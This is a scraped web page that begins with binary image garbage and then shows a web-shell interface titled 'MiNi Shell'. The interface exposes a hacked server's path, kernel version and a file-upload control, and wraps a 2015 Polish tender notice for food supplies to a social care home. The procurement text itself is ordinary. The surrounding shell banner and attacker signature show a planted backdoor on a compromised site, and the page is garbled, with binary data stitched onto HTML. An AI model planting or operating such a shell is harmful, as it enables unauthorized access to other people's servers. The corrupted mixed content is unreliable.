JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151202/177639-N-2015.html

<p class="kh_header"><b>Nowa Wieś Ełcka: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 177639 - 2015; data zamieszczenia: 02.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej , ul. Lipowa 1, 19-321 Nowa Wieś Ełcka, woj. warmińsko-mazurskie, tel. 087 6197770, 6197779, faks 087 6197490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsnwe.fantex.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa artykułów spożywczych dla potrzeb Domu Pomocy Społecznej. Przedmiot zamówienia podzielony został odpowiednio na 6 części, zgodnie z załącznikiem nr 1: (część 1 dostawa pieczywa), (część 2 dostawa mleka i jego przetworów), (część 3 dostawa produktów spożywczych), (część 4 dostawa ryb, przetworów rybnych i mrożonek), (część 5 dostawa mięsa i wędlin), (część 6 dostawa warzyw i owoców ), które stanowią integralną część SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.61.25.00-6, 15.50.00.00-3, 15.80.00.00-6, 15.20.00.00-0, 15.10.00.00-9, 03.20.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wypełnione i podpisane oświadczenie zgodnie z art. 22 ust.1 i art. 24 ust. 1 i 2 ustawy PZP według załącznika Nr 2 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>amawiający przewiduje możliwość zmiany umowy w jej przedmiocie lub terminie wykonania w następujących przypadkach: 
a) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
b) z powodu zmiany uwarunkowań prawnych i formalnych m.in. związanych ze zmianą podatku VAT
c) Zmiany wykonania umowy na skutek okoliczności, niezależnych i obiektywnych, których Zamawiający nie mógł przewidzieć w dacie sporządzenia SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsnwe.fantex.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Nowej Wsi Ełckiej ul. Lipowa 1 19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 09:00, miejsce: Dom Pomocy Społecznej w Nowej Wsi Ełckiej ul. Lipowa 1 19-300 Ełk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Chleb zwykły krojony
15000
kg
2
Chleb razowy zwykły, ze słonecznikiem, soją, ziarnami (450g) krojony
4000
szt
3
Bułka wrocławska (50g)
60000
szt
4
Bułki słodkie z marmoladą, budyniem, makiem, jagodami, jabłkiem, serem (100g)
12000
szt
5
Pączki (50g)
7500
szt
6
Bułka drożdżowa
300
kg
7
Bułka tarta (500g)
300
szt
8
Ciasto rolada z kremem
100
kg
9
Makowiec extra
60
kg
10
Ciasto ptasie mleczko
200
kg
11
Ciasto metrowiec
140
kg
12
Ciasto marcello
150
kg
13
Babka lukrowana lub z cukrem pudrem, z polewą czekoladową
150
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i jego przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
masło (200g) 82% tłuszczu
7800
szt
2
Mleko 3,2% (UHT)
18000
l
3
śmietana 18% (400g)
3900
szt
4
ser żółty gouda, podlaski, edamski
1000
kg
5
serek topiony (100g) z pieczarkami, szynką, ziołami, szczypiorkiem
6000
szt
6
twaróg półtłusty 
1200
kg
7
serek homogenizowany (100g)
7000
szt
8
serek twarogowy do smarowania typu sourage (100g)
1100
szt
9
jogurt owocowy (150g)
18000
szt
10
jogurt naturalny typu greckiego       (400 ml)
350
szt
11
jogurt naturalny ( 180g)
800
szt
12
maślanka naturalna (1l)
500
szt
13
kefir naturalny (180g)
3000
szt
14
margaryna  z masłem (500g)
1200
szt
15
margaryna w kostce do pieczenia, smażenia  (250g)
1200
szt
16
drożdże (100g)
80
szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Ryż
500
kg
2
Ryż paraboilet w saszetkach
200
szt
3
Mąka pszenna poznańska typ 500
900
kg
4
Mąka pszenna wrocławska typ 500
300
kg
5
Mąka ziemniaczana
120
kg
6
Kasza manna
120
kg
7
Kasza jęczmienna średnia
400
kg
8
Kasza jęczmienna mazurska w saszetkach  (1kartonik 4 razy po 100g)
24
szt
9
Kasza gryczana prażona w saszetkach  (1kartonik 4 razy po 100g)
24
szt
10
Kleik ryżowy błyskawiczny (170g)
60
szt
11
Kaszka mleczno-ryżowa  owocowa (230g)
100
szt
12
Kaszka ryżowa bezmleczna owocowa (180g)
100
szt
13
Płatki owsiane zwykłe (0,5kg)
200
kg
14
Budyń (40g)
900
szt
15
Kisiel (40g)
1000
szt
16
Makaron z mąki durum nitki (500g)
300
kg
17
Makaron z mąki durum świderki, muszelki (500g)
500
kg
18
Herbata liściasta  czarna  (100g)
900
szt
19
Herbata liściasta earl grey (100g)
900 
szt
20
Kawa zbożowa inka klasyczna mająca w składzie jęczmień, żyto, cykorię i buraki cukrowe (150g)
700
szt
21
Kakao (100g)
120
szt
22
Ocet spirytusowy 10% (0,5l)
180
szt
23
Musztarda (0,9l) kremska, chrzanowa, sarepska
400
szt
24
Ketchup mający w zawartości przynajmniej 160g pomidora w 100g ketchupu, łagodny i pikantny ( 500g)
500
szt
25
Majonez  napoleoński (0,9l) 
450
szt
26
Olej z pierwszego tłoczenia, filtrowany na zimno (1 l)
50
szt
27
Szczaw krojony (240g)
500
szt
28
Ogórek konserwowy (0,9 l)
700
szt
29
Sałatka wielowarzywna marynowana mająca w skłądzie ogórek cebulę, paprykę i marchew(0,9l)
300
szt
30
Sok owocowy naturalny 100% bez cukru jabłkowy i pomarańczowy (1l)
3600
szt
31
Soczek owocowy przecierowy marchew, jabłko + dowolny smak owocu, mający w składzie przynajmniej 47% koncentratu owocowego. 
8000
szt
32
Syrop owocowy o zawartości ekstraktu ogólnego co najmniej 65% (440 mal)
1500
szt
33
Dżem wysokosłodzony: truskawkowy, wiśniowy, czarna porzeczka (280g)
1500
szt
34
Dżem niskosłodzony brzoskwinia, wiśnia, truskawka (280g)
900 
szt
35
Marmolada wieloowocowa twarda (1 kg)
350
szt
36
Płatki śniadaniowe z miodem, czekoladowe (500g)
100
szt
37
Chrzan śmietankowy (320g)
500
szt
38
Ćwikła z chrzanem (320g)
500
szt
39
Groszek konserwowy (400g)
100
szt
40
Czosnek granulowany (20g)
600
szt
41
Curry (20g)
240
szt
42
Galaretka owocowa (79g)
100
szt
43
Herbatniki  petit-beaure (55g)
1500
szt
44
Liść laurowy (5g)
400
szt
45
Majeranek (6g)
500
szt
46
Papryka w proszku (16g)
250
szt
47
Pieprz ziołowy (20g)
700
szt
48
Pieprz naturalny (15g)
700
szt
49
Przyprawa w płynie (1l) typu maggi
150
szt
50
Sos spaghetti  (0,9l)
300
szt
51
Ziele angielskie (12g)
500
szt
52
Cukier
2400
kg
53
Przyprawa typu jarzynka (500g)
100
kg
54
Cynamon
120
szt
55
Imbir
50
szt
56
Gałka muszkatołowa mielona
50
szt
57
Cukier  waniliowy
400
szt
58
Miód naturalny wielokwiatowy (słoik 1,3 kg; 1 kg;   0,38 kg)
40
kg
59
Sól kamienna (1000g)
400
kg
60
Wafelki (100g)
1500
szt
61
Pieczywo chrupkie bezglutenowe 
220
szt
62
Mąka kukurydziana 
40
kg
63
Czekolada mleczna (100g)
1700
szt
64
Czekolada bez cukru dla diabetyków (100g)
350
szt
65
Kukurydza konserwowa  (400g)
100
szt
66
Makaron bezglutenowy (500g)
30
szt
67
Paszteciki sojowe z papryką, pieczarkami, pomidorami, koperkiem (105g)
100
szt
68
Koncentrat pomidorowy 30% bez konserwantów 
10
kg
69
Tłuszcz roślinny 40%  (olej słonecznikowy) do użycia w piecach konwekcyjno-parowych 
25
l
70
Żelatyna (50g)
100
sz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb przetworów rybnych i mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Filety z miruny SHP (kawałki w tafli 230-280g)
600
kg
2
Kostka (filet) rybna w panierce
50
kg
3
Paluszki (filet) rybne
400
kg
4
Śledź marynowany płaty
60
kg
5
Śledź po wiejsku marynowany
60
kg
6
Matias filety śledziowe w oleju
60
kg
7
Śledź solony płaty
60
kg
8
Paprykarz szczeciński (300g)
400
szt
9
Śledź w oleju (300g)
100
szt
10
Szprot w oleju (300g)
100
szt
11
Szprot w pomidorach (300g)
100
szt
12
Makrela w oleju (300g)
100
szt
13
Makrela w pomidorach (300 g)
100
szt
14
Sałatka rybna (300g)
400
szt
15
Makrela wędzona 
250
kg
16
Filet z makreli z przyprawami wędzony
120
kg
17
Marchew mrożona kostka
600
kg
18
Mieszanka kompotowa 4-składnikowa (śliwka z pestką, wiśnia z pestka, truskawka, porzeczka czerwona)
950
kg
19
Mieszanka kompotowa 7-składnikowa (śliwka z pestką, wiśnia z pestka, rabarbar, truskawka, porzeczka czerwona, porzeczka czarna)
950
kg
20
Mieszanka warzywna
400
kg
21
Truskawka mrożona
200
kg
22
Pyzy z mięsem
240
kg
23
Pierogi z mięsem
120
kg
24
Pierogi z kapustą i grzybami
60
kg
25
Uszka z grzybami
60
kg
26
Kopytka
180
kg
27
Kalafior
200
kg
28
Brukselka
200
kg
29
Brokuły
200
kg
30
Fasolka szparagowa
380
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Szynka wp b/k (vacum)
200
kg
2
Boczek wędzony parzony
60
kg
3
Żeberka wp surowe paski 
30
kg
4
Flak wołowy krojony
300
kg
5
Ozory wp
150
kg
6
Filet z indyka surowy
60
kg
7
Boczek surowy b/ż
200
kg
8
Golonka wp surowa z/k
100
kg
9
Karczek wp b/k (vacum)
350
kg
10
Łopatka wp b/k (vacum)
500
kg
11
Nogi wp surowe
200
kg
12
Podgardle surowe bez skóry
60
kg
13
Schab wp b/k (vacum)
300
kg
14
Słonina surowa bez skóry 
100
kg
15
Filet z kurczaka
180
kg
16
Udka z kurczaka
800
kg
17
Porcje rosołowe
500
kg
18
Pachwina wp surowa
30
kg
19
Żołądki drobiowe
100
kg
20
Kurczak świeży
180
kg
21
Golonka prasowana-wędlina
100
kg
22
Wieprzowa II
200
kg
23
Konserwa mięsna (la´schmit, mielonka wieprzowa, turystyczna 300g)
100
szt
24
Przysmak szynkowy
100
kg
25
Rolada drobiowa
200
kg
26
Kiełbasa parówkowa
300
kg
27
Parówki paluszki typu hot-dog
300
kg
28
Mortadela parzona
50
kg
29
Kiełbasa toruńska 
150
kg
30
Kiełbasa śląska
150
kg
31
Kiełbasa podwawelska
200
kg
32
Kiełbasa biała surowa
270
kg
33
Szynka wieprzowa wędzona
200
kg
34
Szynka drobiowa-wędlina
200
kg
35
Mielonka wieprzowa wędlina
150
kg
36
Polędwica sopocka
200
kg
37
Polędwica drobiowa
200
kg
38
Baleron
150
kg
39
Kiełbasa żywiecka 
150
kg
40
Pieczeń wieprzowo-drobiowa
80
kg
41
Pasztet na wagę
150
kg
42
Kaszanka
180
kg
43
Pasztetowa w osłonce foliowej
60
kg
44
Pasztetowa we flaku  
140
kg
45
Kiełbasa szynkowa
150
kg
46
Wątróbka drobiowa
180
kg
47
Łopatka wołowa b/k
180
kg
48
Pasztet drobiowy, drobiowo-wieprzowy (300g)
200
szt
49
Salami
120
kg
50
Salceson we flaku
140
kg
51
Kiełbasa palcówka 
150
kg
52
Szynka wieprzowa wędzona typu swojskiego, wysokogatunkowa
80
kg
53
Schab wędzony, wysokogatunkowy
100
kg
54
Kiełbasa krakowska sucha
100
kg
55
Boczek wędzony typu swojskiego, wysokogatunkowy
60
kg
56
Podudzie z kurczaka wędzone
250
kg
57
Kości schabowe
450
kg
58
Kości karkowe
450
kg
58
Filet z indyka wędzony
200
kg
59
Kiełbasa krakowska parzona
100
kg
60
Boczek rolowany
150
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Ziemniaki 
17000
kg
2
Groch
100
kg
3
Fasola
200
kg
4
Szczypior
350
szt
5
Por
120
kg
6
Marchew
1500
kg
7
Seler
150
kg
8
Pietruszka
150
kg
9
Buraki
1000
kg
10
Ogórek szklarniowy
600
kg
11
Cebula
600
kg
12
Kalafior
200
szt
13
Pomidory
600
kg
14
Kapusta pekińska
180
kg
15
Kapusta włoska
200
szt
16
Kapusta biała
1200
kg
17
Kapusta kiszona
550
kg
18
Kapusta czerwona
90
kg
19
Ogórek kiszony
650
kg
20
Pieczarki
180
kg
21
Koper
1000
szt
22
Natka pietruszki
1000
szt
23
Banany
1200
kg
24
Jabłka
2200
kg
25
Jaja
1100
kg
26
Rzodkiewka (pęczek)
180
szt
27
Pomarańcze
1500
kg
28
Biała rzodkiew
120
kg
29
Sałata masłowa
130
szt
30
Papryka czerwona
kg
100
31
Cytryna
180
kg
32
Mandarynki
1000
kg
33
Gruszki
700
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com